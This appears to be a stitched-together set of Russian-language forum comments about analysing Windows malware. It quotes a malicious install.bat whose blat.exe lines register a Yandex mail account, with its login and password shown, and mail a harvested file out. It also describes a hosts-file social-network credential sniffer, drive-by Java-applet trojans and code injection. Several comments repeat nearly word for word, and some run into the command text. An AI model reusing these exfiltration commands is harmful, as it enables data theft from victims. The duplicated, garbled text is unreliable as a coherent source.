Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptscэто строка в батнике install.bat записывает в реестр аккаунт, с которого отсылается почта. %SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exitэта строка отправляет указанный файл на указанный адрес.
письмо отправилось на свой же ящик.
Да и просниффать можно элементарно, тут же нет ssl.
Не нравится мне переход на третий питон, когда последний раз «трогал» calculate — приходилось маскировать третью ветку. Тут как? третий питон уже в коробке?
Кстати из всей хвори, что выкачивают лоадеры, попался и сниффер учеток соц.сетей. До конца еще не разобрался, но похоже, что вредонос поднимает веб-сервер или прокси, пропускающую через себя траффик по определенным в файле hosts доменам. То есть в файле hosts нашел записи вида 127.0.0.1 vk.com, при этом сайты работают. А при вводе данных в поля авторизации происходит отправка содержимого форм «налево».
Отсюда и спам, отсюда и комментарии на стенах от знакомых людей.
Могут быть использованы так называемые drive-by атаки на браузер. Возможно, не совсем верно выразился, но я сталкивался с подобным. При переходе на сайт производится попытка запустить ява-апплет. Под виндой загрузка ява апплета включала видео-ролик, а на фоне скачивала и запускала трояна.
На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
На семерке вредонос запросит администраторских прав (UAC вылезет), а при открытии блокнота двойным кликом, он запускается с правами пользователя, прав у которого на правку системного файла не хватит. Так вот запускать его нужно правым кликом -> Запуск от имени администратора.
Собственно, это имелось виду, забыл уточнить.
blogs.cisco.com/wp-content/uploads/wireshark-wm.png
rdgsoft.8k.com/
Тоже постоянно обновляемая мощная тулза.
Аналог PEiD есть — это Exeinfo PE. Обновляется регулярно. В данный момент оф.сайт почему-то недоступен.
Есть статья на англицком: www2.inf.fh-bonn-rhein-sieg.de/~ikarim2s/how2injectcode/code_inject.html
И ее перевод: www.xaker.name/forvb/showthread.php?t=22158
Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptscэто строка в батнике install.bat записывает в реестр аккаунт, с которого отсылается почта.%SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exitэта строка отправляет указанный файл на указанный адрес.письмо отправилось на свой же ящик.
Да и просниффать можно элементарно, тут же нет ssl.
Кстати из всей хвори, что выкачивают лоадеры, попался и сниффер учеток соц.сетей. До конца еще не разобрался, но похоже, что вредонос поднимает веб-сервер или прокси, пропускающую через себя траффик по определенным в файле hosts доменам. То есть в файле hosts нашел записи вида 127.0.0.1 vk.com, при этом сайты работают. А при вводе данных в поля авторизации происходит отправка содержимого форм «налево».
Отсюда и спам, отсюда и комментарии на стенах от знакомых людей.
Вполне возможно, что это фальшивая сигнатура.
На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
Собственно, это имелось виду, забыл уточнить.